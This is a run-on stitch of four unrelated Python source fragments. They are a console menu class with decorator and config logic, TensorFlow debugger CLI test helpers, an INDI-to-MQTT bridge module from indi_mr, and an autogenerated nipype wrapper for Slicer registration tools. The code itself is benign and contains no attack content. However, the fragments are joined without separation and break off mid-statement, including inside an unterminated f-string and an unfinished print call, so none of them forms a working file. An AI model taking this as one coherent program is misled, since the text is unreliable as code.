'logs'). def display( self, style : StringType = 'decorator', method : StringType = 'dictionary', return_option : StringType = 'logs', ) -> StringDictionary: if style == 'decorator': if return_option == 'logs': if method == 'basic': def wrapper(func): def decorator(self,*args, **kwargs): func(*args, **kwargs) return self.basic_menu return decorator return wrapper elif method == 'descriptive': def wrapper(func): def decorator(self,*args, **kwargs): func(*args, **kwargs) return self.descriptive_menu return decorator return wrapper elif method == 'dictionary': def wrapper(func): def decorator(self, *args, **kwargs): func(*args, **kwargs) return self.dictionary_menu return decorator return wrapper elif return_option == 'function': if method == 'basic': def wrapper(func): def decorator(self, *args, **kwargs): print(self.basic_menu) return func(*args, **kwargs) return decorator return wrapper elif method == 'descriptive': def wrapper(func): def decorator(self, *args, **kwargs): print(self.descriptive_menu) return func(*args, **kwargs) return decorator return wrapper elif method == 'dictionary': def wrapper(func): def decorator(self, *args, **kwargs): print(self.dictionary_menu) return func(*args, **kwargs) return decorator return wrapper elif style == 'function': if method == 'basic': return self.basic_menu elif method == 'descriptive': return self.descriptive_menu elif method == 'dictionary': return self.dictionary_menu # type ('static' - adapts to the execution of static non-self methods and functions.) # type ('dynamic' - adapts to the execution of dynamic class self methods and functions.) # display_headline - displays the desired headline. # display_message - displays input value message. # output_message - confirmation of the chosen value. # method ('descriptive' - shows stored option_name and it's description.) # method ('basic' - shows only the stored option_name.) # alignment ('basic' - shows all stored option_name and option_description values in a row.) # alignment ('newline' -shows all stored option_name and option_description values in a new line.) # queue (True/False) - enables stacking of functions and executing them in a chain. # show_dtypes (True/False) - shows the dtype of the input value. # - # creates an executeable menu from defined entries on top of functions. # DEFAULT: record.config(type = 'static', display_headline ='AVAILABLE OPTIONS', display_message = 'ENTER THE OPTION: ', output_message = 'YOU HAVE CHOSEN: ', method = 'descriptive', alignment = 'newline', queue = False, show_dtypes = True). def config( self, type : StringType = 'static', display_headline : StringType ='AVAILABLE OPTIONS', display_message : StringType = 'ENTER THE OPTION: ', output_message : StringType = 'YOU HAVE CHOSEN: ', method : StringType = 'descriptive', alignment : StringType = 'newline', queue: BooleanType = False, show_dtypes: BooleanType = True, ) -> DictionaryType: self.display_headline = display_headline self.display_message = display_message self.output_message = output_message self.queue = queue self.show_dtypes = show_dtypes self.yield_name = 0 # list item counter that enables iterating through the list. # assert type. if type != 'static' and type != 'dynamic': type = 'static' print('WARNING: Automactically forced type to static due to invalid type choice.') print('Write type = \'static\' or type = \'dynamic\' in the config option to change how this impacts the behaviour of executed functions in the menu.') print('') if alignment == 'basic': if method == 'basic': show_menu = self.display(style = 'function', method = 'basic') print(self.display_headline) print('-----------------') print(show_menu) elif method == 'descriptive': show_menu = self.display(style = 'function', method = 'descriptive') print(self.display_headline) print('-----------------') print(show_menu) else: print('INVALID METHOD CHOSEN, THE PROGRAM WILL CONTINUE WITHOUT DISPLAYED OPTIONS.\n') elif alignment == 'newline': if method == 'basic': show_menu = self.display(style = 'function', method = 'basic') print(self.display_headline) print('-----------------') for line in show_menu: print(line) elif method == 'descriptive': show_menu = self.display(style = 'function', method = 'descriptive') print(self.display_headline) print('-----------------') for line in show_menu: print(line) else: print('INVALID METHOD CHOSEN, THE PROGRAM WILL CONTINUE WITHOUT DISPLAYED OPTIONS.\n') if queue == False: self.option = input('\n' + self.display_message) self.print_option = self.print_val_dict[self.option] print(self.output_message, self.option + '\n') # executes autoinit function. if self.contains_autoinit == True: try: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i](self) except: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i]() if type == 'static': try: if self.print_option == False: return self.dictionary_menu[self.option](self) else: return print(self.dictionary_menu[self.option](self)) except: if self.print_option == False: return self.dictionary_menu[self.option]() else: return print(self.dictionary_menu[self.option]()) elif type == 'dynamic': try: return self.dictionary_menu[self.option]() except: return self.dictionary_menu[self.option](self) if queue == True: # executes autoinit functions. if self.contains_autoinit == True: try: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i](self) except: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i]() # enables a loop to execute functions in a chain. self.queue_handler() if type == 'static': print(self.tmp_name_list[self.yield_name]) for tmp_func in self.tmp_list: self.clone_dict = self.tmp_name_list[self.yield_name] self.print_option = self.tmp_print_list[self.yield_name] print(self.tmp_name_list[self.yield_name]) self.redefine() try: if self.print_option == False: tmp_func(self, **self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(self, **self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 except: if self.print_option == False: tmp_func(**self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(**self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 elif type == 'dynamic': for tmp_func in self.tmp_list: self.clone_dict = self.tmp_name_list[self.yield_name] self.print_option = self.tmp_print_list[self.yield_name] print(self.tmp_name_list[self.yield_name]) self.redefine() try: if self.print_option == False: tmp_func(**self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(**self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 except: if self.print_option == False: tmp_func(self, **self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(self, **self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 return # variable - name of the function argument input is being passed as. # type - type of the data being passed ('int', 'float', 'str', 'bool', 'list', 'tuple', 'dict' and 'vector' supported). # - # function that stores the input value in a dictionary. def store(self, variable, type): self.type = type self.variable = variable self.individual_dict[self.dict_name][self.variable] = self.type self.reset_dict[self.dict_name][self.variable] = self.type return self.dict_name # function that casts an input of a certain data type and formats it before sending as a function argument. def redefine(self): if self.show_dtypes == True: print(self.reset_dict) for i in self.individual_dict[self.clone_dict]: self.format = self.reset_dict[self.clone_dict][i] if self.format != 'list': self.new_i = input(f'Enter the {i}:
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests of the Analyzer CLI Backend.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import tempfile import numpy as np from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.protobuf import config_pb2 from tensorflow.core.protobuf import rewriter_config_pb2 from tensorflow.python.client import session from tensorflow.python.debug.cli import analyzer_cli from tensorflow.python.debug.cli import cli_config from tensorflow.python.debug.cli import cli_shared from tensorflow.python.debug.cli import cli_test_utils from tensorflow.python.debug.cli import command_parser from tensorflow.python.debug.cli import debugger_cli_common from tensorflow.python.debug.lib import debug_data from tensorflow.python.debug.lib import debug_utils from tensorflow.python.debug.lib import source_utils from tensorflow.python.framework import constant_op from tensorflow.python.framework import test_util from tensorflow.python.lib.io import file_io from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import variables from tensorflow.python.platform import googletest from tensorflow.python.platform import test from tensorflow.python.util import tf_inspect # Helper function to accommodate MKL-enabled TensorFlow: # MatMul op is supported by MKL and its name is prefixed with "_Mkl" during the # MKL graph rewrite pass. def _matmul_op_name(): return "_MklMatMul" if test_util.IsMklEnabled() else "MatMul" def _cli_config_from_temp_file(): return cli_config.CLIConfig( config_file_path=os.path.join(tempfile.mkdtemp(), ".tfdbg_config")) def no_rewrite_session_config(): rewriter_config = rewriter_config_pb2.RewriterConfig( disable_model_pruning=True, constant_folding=rewriter_config_pb2.RewriterConfig.OFF, arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF, dependency_optimization=rewriter_config_pb2.RewriterConfig.OFF, pin_to_host_optimization=rewriter_config_pb2.RewriterConfig.OFF) graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config) return config_pb2.ConfigProto(graph_options=graph_options) def line_number_above(): return tf_inspect.stack()[1][2] - 1 def parse_op_and_node(line): """Parse a line containing an op node followed by a node name. For example, if the line is " [Variable] hidden/weights", this function will return ("Variable", "hidden/weights") Args: line: The line to be parsed, as a str. Returns: Name of the parsed op type. Name of the parsed node. """ op_type = line.strip().split(" ")[0].replace("[", "").replace("]", "") # Not using [-1], to tolerate any other items that might be present behind # the node name. node_name = line.strip().split(" ")[1] return op_type, node_name def assert_column_header_command_shortcut(tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name): tst.assertFalse(reverse and "-r" in command) tst.assertFalse(not(op_type_regex) and ("-t %s" % op_type_regex) in command) tst.assertFalse( not(node_name_regex) and ("-t %s" % node_name_regex) in command) tst.assertFalse( not(tensor_filter_name) and ("-t %s" % tensor_filter_name) in command) def assert_listed_tensors(tst, out, expected_tensor_names, expected_op_types, node_name_regex=None, op_type_regex=None, tensor_filter_name=None, sort_by="timestamp", reverse=False): """Check RichTextLines output for list_tensors commands. Args: tst: A test_util.TensorFlowTestCase instance. out: The RichTextLines object to be checked. expected_tensor_names: (list of str) Expected tensor names in the list. expected_op_types: (list of str) Expected op types of the tensors, in the same order as the expected_tensor_names. node_name_regex: Optional: node name regex filter. op_type_regex: Optional: op type regex filter. tensor_filter_name: Optional: name of the tensor filter. sort_by: (str) (timestamp | op_type | tensor_name) the field by which the tensors in the list are sorted. reverse: (bool) whether the sorting is in reverse (i.e., descending) order. """ line_iter = iter(out.lines) attr_segs = out.font_attr_segs line_counter = 0 num_dumped_tensors = int(next(line_iter).split(" ")[0]) line_counter += 1 tst.assertGreaterEqual(num_dumped_tensors, len(expected_tensor_names)) if op_type_regex is not None: tst.assertEqual("Op type regex filter: \"%s\"" % op_type_regex, next(line_iter)) line_counter += 1 if node_name_regex is not None: tst.assertEqual("Node name regex filter: \"%s\"" % node_name_regex, next(line_iter)) line_counter += 1 tst.assertEqual("", next(line_iter)) line_counter += 1 # Verify the column heads "t (ms)", "Op type" and "Tensor name" are present. line = next(line_iter) tst.assertIn("t (ms)", line) tst.assertIn("Op type", line) tst.assertIn("Tensor name", line) # Verify the command shortcuts in the top row. attr_segs = out.font_attr_segs[line_counter] attr_seg = attr_segs[0] tst.assertEqual(0, attr_seg[0]) tst.assertEqual(len("t (ms)"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s timestamp", command) assert_column_header_command_shortcut( tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) idx0 = line.index("Size") attr_seg = attr_segs[1] tst.assertEqual(idx0, attr_seg[0]) tst.assertEqual(idx0 + len("Size (B)"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s dump_size", command) assert_column_header_command_shortcut(tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) idx0 = line.index("Op type") attr_seg = attr_segs[2] tst.assertEqual(idx0, attr_seg[0]) tst.assertEqual(idx0 + len("Op type"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s op_type", command) assert_column_header_command_shortcut( tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) idx0 = line.index("Tensor name") attr_seg = attr_segs[3] tst.assertEqual(idx0, attr_seg[0]) tst.assertEqual(idx0 + len("Tensor name"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s tensor_name", command) assert_column_header_command_shortcut( tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) # Verify the listed tensors and their timestamps. tensor_timestamps = [] dump_sizes_bytes = [] op_types = [] tensor_names = [] for line in line_iter: items = line.split(" ") items = [item for item in items if item] rel_time = float(items[0][1:-1]) tst.assertGreaterEqual(rel_time, 0.0) tensor_timestamps.append(rel_time) dump_sizes_bytes.append(command_parser.parse_readable_size_str(items[1])) op_types.append(items[2]) tensor_names.append(items[3]) # Verify that the tensors should be listed in ascending order of their # timestamps. if sort_by == "timestamp": sorted_timestamps = sorted(tensor_timestamps) if reverse: sorted_timestamps.reverse() tst.assertEqual(sorted_timestamps, tensor_timestamps) elif sort_by == "dump_size": sorted_dump_sizes_bytes = sorted(dump_sizes_bytes) if reverse: sorted_dump_sizes_bytes.reverse() tst.assertEqual(sorted_dump_sizes_bytes, dump_sizes_bytes) elif sort_by == "op_type": sorted_op_types = sorted(op_types) if reverse: sorted_op_types.reverse() tst.assertEqual(sorted_op_types, op_types) elif sort_by == "tensor_name": sorted_tensor_names = sorted(tensor_names) if reverse: sorted_tensor_names.reverse() tst.assertEqual(sorted_tensor_names, tensor_names) else: tst.fail("Invalid value in sort_by: %s" % sort_by) # Verify that the tensors are all listed. for tensor_name, op_type in zip(expected_tensor_names, expected_op_types): tst.assertIn(tensor_name, tensor_names) index = tensor_names.index(tensor_name) tst.assertEqual(op_type, op_types[index]) def assert_node_attribute_lines(tst, out, node_name, op_type, device, input_op_type_node_name_pairs, ctrl_input_op_type_node_name_pairs, recipient_op_type_node_name_pairs, ctrl_recipient_op_type_node_name_pairs, attr_key_val_pairs=None, num_dumped_tensors=None, show_stack_trace=False, stack_trace_available=False): """Check RichTextLines output for node_info commands. Args: tst: A test_util.TensorFlowTestCase instance. out: The RichTextLines object to be checked. node_name: Name of the node. op_type: Op type of the node, as a str. device: Name of the device on which the node resides. input_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the (non-control) inputs to the node. ctrl_input_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the control inputs to the node. recipient_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the (non-control) output recipients to the node. ctrl_recipient_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the control output recipients to the node. attr_key_val_pairs: Optional: attribute key-value pairs of the node, as a list of 2-tuples. num_dumped_tensors: Optional: number of tensor dumps from the node. show_stack_trace: (bool) whether the stack trace of the node's construction is asserted to be present. stack_trace_available: (bool) whether Python stack trace is available. """ line_iter = iter(out.lines) tst.assertEqual("Node %s" % node_name, next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual(" Op: %s" % op_type, next(line_iter)) tst.assertEqual(" Device: %s" % device, next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual(" %d input(s) + %d control input(s):" % (len(input_op_type_node_name_pairs), len(ctrl_input_op_type_node_name_pairs)), next(line_iter)) # Check inputs. tst.assertEqual(" %d input(s):" % len(input_op_type_node_name_pairs), next(line_iter)) for op_type, node_name in input_op_type_node_name_pairs: tst.assertEqual(" [%s] %s" % (op_type, node_name), next(line_iter)) tst.assertEqual("", next(line_iter)) # Check control inputs. if ctrl_input_op_type_node_name_pairs: tst.assertEqual(" %d control input(s):" % len(ctrl_input_op_type_node_name_pairs), next(line_iter)) for op_type, node_name in ctrl_input_op_type_node_name_pairs: tst.assertEqual(" [%s] %s" % (op_type, node_name), next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual(" %d recipient(s) + %d control recipient(s):" % (len(recipient_op_type_node_name_pairs), len(ctrl_recipient_op_type_node_name_pairs)), next(line_iter)) # Check recipients, the order of which is not deterministic. tst.assertEqual(" %d recipient(s):" % len(recipient_op_type_node_name_pairs), next(line_iter)) t_recs = [] for _ in recipient_op_type_node_name_pairs: line = next(line_iter) op_type, node_name = parse_op_and_node(line) t_recs.append((op_type, node_name)) tst.assertItemsEqual(recipient_op_type_node_name_pairs, t_recs) # Check control recipients, the order of which is not deterministic. if ctrl_recipient_op_type_node_name_pairs: tst.assertEqual("", next(line_iter)) tst.assertEqual(" %d control recipient(s):" % len(ctrl_recipient_op_type_node_name_pairs), next(line_iter)) t_ctrl_recs = [] for _ in ctrl_recipient_op_type_node_name_pairs: line = next(line_iter) op_type, node_name = parse_op_and_node(line) t_ctrl_recs.append((op_type, node_name)) tst.assertItemsEqual(ctrl_recipient_op_type_node_name_pairs, t_ctrl_recs) # The order of multiple attributes can be non-deterministic. if attr_key_val_pairs: tst.assertEqual("", next(line_iter)) tst.assertEqual("Node attributes:", next(line_iter)) kv_pairs = [] for key, val in attr_key_val_pairs: key = next(line_iter).strip().replace(":", "") val = next(line_iter).strip() kv_pairs.append((key, val)) tst.assertEqual("", next(line_iter)) if num_dumped_tensors is not None: tst.assertEqual("%d dumped tensor(s):" % num_dumped_tensors, next(line_iter)) tst.assertEqual("", next(line_iter)) dump_timestamps_ms = [] for _ in xrange(num_dumped_tensors): line = next(line_iter) tst.assertStartsWith(line.strip(), "Slot 0 @ DebugIdentity @") tst.assertTrue(line.strip().endswith(" ms")) dump_timestamp_ms = float(line.strip().split(" @ ")[-1].replace("ms", "")) tst.assertGreaterEqual(dump_timestamp_ms, 0.0) dump_timestamps_ms.append(dump_timestamp_ms) tst.assertEqual(sorted(dump_timestamps_ms), dump_timestamps_ms) if show_stack_trace: tst.assertEqual("", next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual("Traceback of node construction:", next(line_iter)) if stack_trace_available: try: depth_counter = 0 while True: for i in range(5): line = next(line_iter) if i == 0: tst.assertEqual(depth_counter, int(line.split(":")[0])) elif i == 1: tst.assertStartsWith(line, " Line:") elif i == 2: tst.assertStartsWith(line, " Function:") elif i == 3: tst.assertStartsWith(line, " Text:") elif i == 4: tst.assertEqual("", line) depth_counter += 1
<filename>indi_mr/i_to_m.py """Defines blocking function inditomqtt: Receives XML data from indiserver on port 7624 and publishes via MQTT. Receives data from MQTT, and outputs to port 7624 and indiserver. """ import sys, collections, threading, asyncio from time import sleep from datetime import datetime import xml.etree.ElementTree as ET from . import toindi, fromindi, tools MQTT_AVAILABLE = True try: import paho.mqtt.client as mqtt except: MQTT_AVAILABLE = False # _STARTTAGS is a tuple of ( b'<defTextVector', ... ) data received will be tested to start with such a starttag _STARTTAGS = tuple(b'<' + tag for tag in fromindi.TAGS) # _ENDTAGS is a tuple of ( b'</defTextVector>', ... ) data received will be tested to end with such an endtag _ENDTAGS = tuple(b'</' + tag + b'>' for tag in fromindi.TAGS) ### MQTT Handlers for inditomqtt def _inditomqtt_on_message(client, userdata, message): "Callback when an MQTT message is received" if message.topic == userdata["pubsnoopcontrol"]: # The message received on the snoop control topic, is one this device has transmitted, ignore it return # On receiving a getproperties on snoop_control/#, checks the name, property to be snooped if message.topic.startswith(userdata["snoop_control_topic"]+"/"): try: root = ET.fromstring(message.payload.decode("utf-8")) except Exception: # possible malformed return if root.tag != "getProperties": # only getProperties listenned to on snoop_control_topic return devicename = root.get("device") propertyname = root.get("name") if propertyname and (not devicename): # illegal return snooptopic, remote_mqtt_id = message.topic.split("/", maxsplit=1) if not devicename: # Its a snoop everything request userdata["sendsnoopall"].add(remote_mqtt_id) elif not propertyname: # Its a snoop device request sendsnoopdevices = userdata["sendsnoopdevices"] if devicename in sendsnoopdevices: sendsnoopdevices[devicename].add(remote_mqtt_id) else: sendsnoopdevices[devicename] = set((remote_mqtt_id,)) else: # Its a snoop device/property request sendsnoopproperties = userdata["sendsnoopproperties"] if (devicename,propertyname) in sendsnoopproperties: sendsnoopproperties[devicename,propertyname].add(remote_mqtt_id) else: sendsnoopproperties[devicename,propertyname] = set((remote_mqtt_id,)) if message.payload.startswith(b"delProperty"): try: root = ET.fromstring(message.payload.decode("utf-8")) except Exception: # possible malformed return _remove(root, userdata) # we have received a message from the mqtt server, put it into the data_to_indi buffer userdata['data_to_indi'].append(message.payload) def _inditomqtt_on_connect(client, userdata, flags, rc): "The callback for when the client receives a CONNACK response from the MQTT server, renew subscriptions" userdata['data_to_indi'].clear() # - start with fresh empty data_to_indi buffer if rc == 0: userdata['comms'] = True # Subscribing in on_connect() means that if we lose the connection and # reconnect then subscriptions will be renewed. if userdata["subscribe_list"]: # subscribe to those remote id's listed subscribe_list = list((userdata["to_indi_topic"] + "/" + remote_id, 2) for remote_id in userdata["subscribe_list"] ) # gives a list of [(topic1,2),(topic2,2),(topic3,2)] client.subscribe( subscribe_list ) else: # subscribe to all remote id's client.subscribe( userdata["to_indi_topic"] + "/#", 2 ) # Every device subscribes to snoop_control/# being the snoop_control topic and all subtopics client.subscribe( userdata["snoopcontrol"], 2 ) # and to snoop_data/mqtt_id client.subscribe( userdata["snoopdata"], 2 ) # Finally, send a getProperties to all devices, so they refresh data userdata['data_to_indi'].append(b"<getProperties version=\"1.7\" />") print(f"""MQTT connected""") else: userdata['comms'] = False def _inditomqtt_on_disconnect(client, userdata, rc): "The MQTT client has disconnected, set userdata['comms'] = False, and clear out any data hanging about in data_to_indi" userdata['comms'] = False userdata['data_to_indi'].clear() def _sendtomqtt(payload, topic, mqtt_client): "Gets data which has been received from indi, and transmits to mqtt" result = mqtt_client.publish(topic=topic, payload=payload, qos=2) result.wait_for_publish() class _PortHandler: def __init__(self, loop, userdata, mqtt_client, indiserver): "Sets the userdata" self.userdata = userdata self.loop = loop self.mqtt_client = mqtt_client self.indiserver = indiserver self.topic = userdata["from_indi_topic"] + "/" + userdata["mqtt_id"] self.snoop_data_topic = userdata["snoop_data_topic"] + "/" # this will always have a remote mqtt_id appended self.data_to_indi = userdata['data_to_indi'] self.deviceset = userdata['deviceset'] self.sendsnoopall = userdata["sendsnoopall"] self.sendsnoopdevices = userdata["sendsnoopdevices"] self.sendsnoopproperties = userdata["sendsnoopproperties"] async def handle_data(self): reader, writer = await asyncio.open_connection(self.indiserver.host,self.indiserver.port) _message(self.topic, self.mqtt_client, f"Connected to {self.indiserver.host}:{self.indiserver.port}") await asyncio.gather(self.txtoindi(writer), self.rxfromindi(reader)) async def txtoindi(self, writer): "Pop message from data_to_indi deque, and write it to the port connection" while True: if self.data_to_indi: # Send the next message to the indiserver to_indi = self.data_to_indi.popleft() writer.write(to_indi) await writer.drain() else: # no message to send, do an async pause await asyncio.sleep(0.5) async def rxfromindi(self, reader): """get data received from the port connection, and call _sendtomqtt to send it to MQTT checks if the data received is to be sent to a snooping device, if so, send it""" message = b'' messagetagnumber = None while True: # get blocks of data from the indiserver try: data = await reader.readuntil(separator=b'>') except asyncio.LimitOverrunError: data = await reader.read(n=32000) if not message: # data is expected to start with <tag, first strip any newlines data = data.strip() for index, st in enumerate(_STARTTAGS): if data.startswith(st): messagetagnumber = index break else: # check if data received is a b'<getProperties ... />' snooping request if data.startswith(b'<getProperties '): # send a snoop request on topic snoop_control/mqtt_id where mqtt_id is its own id result = await self.loop.run_in_executor(None, _sendtomqtt, data, self.userdata["pubsnoopcontrol"], self.mqtt_client) # data is either a getProperties, or does not start with a recognised tag, so ignore it # and continue waiting for a valid message start continue # set this data into the received message message = data # either further children of this tag are coming, or maybe its a single tag ending in "/>" if message.endswith(b'/>'): # the message is complete, handle message here try: root = ET.fromstring(message.decode("utf-8")) except Exception: # possible malformed message = b'' messagetagnumber = None continue devicename = root.get("device") # Run '_sendtomqtt' in the default loop's executor: result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client) # check if this data it to be sent to snooping devices for mqtt_id in self.sendsnoopall: # these connections snoop everything snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) if devicename in self.deviceset: if devicename in self.sendsnoopdevices: # set of mqtt_id's which snoop this devicename for mqtt_id in self.sendsnoopdevices[devicename]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) propertyname = root.get("name") if propertyname: if (devicename,propertyname) in self.sendsnoopproperties: # set of mqtt_id's which snoop this devicename/propertyname for mqtt_id in self.sendsnoopproperties[devicename,propertyname]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) # and start again, waiting for a new message if devicename: self.deviceset.add(devicename) if root.tag == "delProperty": # remove this device/property from snooping records _remove(root, self.userdata) message = b'' messagetagnumber = None # and read either the next message, or the children of this tag continue # To reach this point, the message is in progress, with a messagetagnumber set # keep adding the received data to message, until an endtag is reached message += data if message.endswith(_ENDTAGS[messagetagnumber]): # the message is complete, handle message here try: root = ET.fromstring(message.decode("utf-8")) except Exception: # possible malformed message = b'' messagetagnumber = None continue devicename = root.get("device") # Run '_sendtomqtt' in the default loop's executor: result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client) # check if this data it to be sent to snooping devices for mqtt_id in self.sendsnoopall: # these connections snoop everything snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) if devicename in self.deviceset: if devicename in self.sendsnoopdevices: # set of mqtt_id's which snoop this devicename for mqtt_id in self.sendsnoopdevices[devicename]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) propertyname = root.get("name") if propertyname: if (devicename,propertyname) in self.sendsnoopproperties: # set of mqtt_id's which snoop this devicename/propertyname for mqtt_id in self.sendsnoopproperties[devicename,propertyname]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) # and start again, waiting for a new message if devicename: self.deviceset.add(devicename) if root.tag == "delProperty": # remove this device/property from snooping records _remove(root, self.userdata) message = b'' messagetagnumber = None def inditomqtt(indiserver, mqtt_id, mqttserver, subscribe_list=[]): """Blocking call that provides the indiserver - mqtt connection. If subscribe list is empty then this function subscribes to received data from all remote mqtt_id's. If it contains a list of mqtt_id's, then only subscribes to their data. :param indiserver: Named Tuple providing the indiserver parameters :type indiserver: namedtuple :param mqtt_id: A unique string, identifying this connection :type mqtt_id: String :param mqttserver: Named Tuple providing the mqtt server parameters :type mqttserver: namedtuple :param subscribe_list: List of remote mqtt_id's to subscribe to :type subscribe_list: List """ if not MQTT_AVAILABLE: print("Error - Unable to import
# -*- coding: utf-8 -*- # -*- coding: utf8 -*- """Autogenerated file - DO NOT EDIT If you spot a bug, please report it on the mailing list and/or change the generator.""" from nipype.interfaces.base import ( CommandLine, CommandLineInputSpec, SEMLikeCommandLine, TraitedSpec, File, Directory, traits, isdefined, InputMultiPath, OutputMultiPath, ) import os class BSplineDeformableRegistrationInputSpec(CommandLineInputSpec): iterations = traits.Int(desc="Number of iterations", argstr="--iterations %d") gridSize = traits.Int( desc="Number of grid points on interior of the fixed image. Larger grid sizes allow for finer registrations.", argstr="--gridSize %d", ) histogrambins = traits.Int( desc="Number of histogram bins to use for Mattes Mutual Information. Reduce the number of bins if a deformable registration fails. If the number of bins is too large, the estimated PDFs will be a field of impulses and will inhibit reliable registration estimation.", argstr="--histogrambins %d", ) spatialsamples = traits.Int( desc="Number of spatial samples to use in estimating Mattes Mutual Information. Larger values yield more accurate PDFs and improved registration quality.", argstr="--spatialsamples %d", ) constrain = traits.Bool( desc="Constrain the deformation to the amount specified in Maximum Deformation", argstr="--constrain ", ) maximumDeformation = traits.Float( desc="If Constrain Deformation is checked, limit the deformation to this amount.", argstr="--maximumDeformation %f", ) default = traits.Int( desc="Default pixel value used if resampling a pixel outside of the volume.", argstr="--default %d", ) initialtransform = File( desc="Initial transform for aligning the fixed and moving image. Maps positions in the fixed coordinate frame to positions in the moving coordinate frame. This transform should be an affine or rigid transform. It is used an a bulk transform for the BSpline. Optional.", exists=True, argstr="--initialtransform %s", ) FixedImageFileName = File( position=-2, desc="Fixed image to which to register", exists=True, argstr="%s" ) MovingImageFileName = File( position=-1, desc="Moving image", exists=True, argstr="%s" ) outputtransform = traits.Either( traits.Bool, File(), hash_files=False, desc="Transform calculated that aligns the fixed and moving image. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--outputtransform %s", ) outputwarp = traits.Either( traits.Bool, File(), hash_files=False, desc="Vector field that applies an equivalent warp as the BSpline. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional.", argstr="--outputwarp %s", ) resampledmovingfilename = traits.Either( traits.Bool, File(), hash_files=False, desc="Resampled moving image to fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--resampledmovingfilename %s", ) class BSplineDeformableRegistrationOutputSpec(TraitedSpec): outputtransform = File( desc="Transform calculated that aligns the fixed and moving image. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) outputwarp = File( desc="Vector field that applies an equivalent warp as the BSpline. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional.", exists=True, ) resampledmovingfilename = File( desc="Resampled moving image to fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) class BSplineDeformableRegistration(SEMLikeCommandLine): """title: BSpline Deformable Registration category: Legacy.Registration description: Registers two images together using BSpline transform and mutual information. version: 0.1.0.$Revision: 19608 $(alpha) documentation-url: http://wiki.slicer.org/slicerWiki/index.php/Documentation/4.1/Modules/BSplineDeformableRegistration contributor: <NAME> (GE) acknowledgements: This work is part of the National Alliance for Medical Image Computing (NAMIC), funded by the National Institutes of Health through the NIH Roadmap for Medical Research, Grant U54 EB005149. """ input_spec = BSplineDeformableRegistrationInputSpec output_spec = BSplineDeformableRegistrationOutputSpec _cmd = "BSplineDeformableRegistration " _outputs_filenames = { "resampledmovingfilename": "resampledmovingfilename.nii", "outputtransform": "outputtransform.txt", "outputwarp": "outputwarp.nrrd", } class AffineRegistrationInputSpec(CommandLineInputSpec): fixedsmoothingfactor = traits.Int( desc="Amount of smoothing applied to fixed image prior to registration. Default is 0 (none). Range is 0-5 (unitless). Consider smoothing the input data if there is considerable amounts of noise or the noise pattern in the fixed and moving images is very different.", argstr="--fixedsmoothingfactor %d", ) movingsmoothingfactor = traits.Int( desc="Amount of smoothing applied to moving image prior to registration. Default is 0 (none). Range is 0-5 